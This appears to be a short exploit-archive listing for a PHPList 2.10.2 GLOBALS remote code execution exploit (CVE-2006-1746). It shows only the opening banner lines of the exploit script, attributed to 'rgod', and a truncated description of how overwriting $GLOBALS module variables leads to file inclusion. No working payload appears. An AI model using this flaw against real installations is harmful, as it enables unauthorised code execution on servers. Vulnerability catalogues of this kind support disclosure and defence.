PHPList <= 2.10.2 GLOBALS[] Remote Code Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo PHPList = 2.10.2 GLOBALS remote cmmnds xctn \r\n; echo by rgod [email protected]\r\n; echo site: http://retrogod.altervista.org\r\n\r\n; echo - this works against registerglobals=On \r\n; echo a dork:...

CVE-2006-1746

The CVE-2006-1746 issue affects phpList &lt;= 2.10.2, where the index.php’s database_module (and language_module) handling allows Local File Inclusion by overwriting $GLOBALS via user-supplied GLOBALS[database_module]/GLOBALS[language_module]. The root cause is inadequate input sanitization and, ...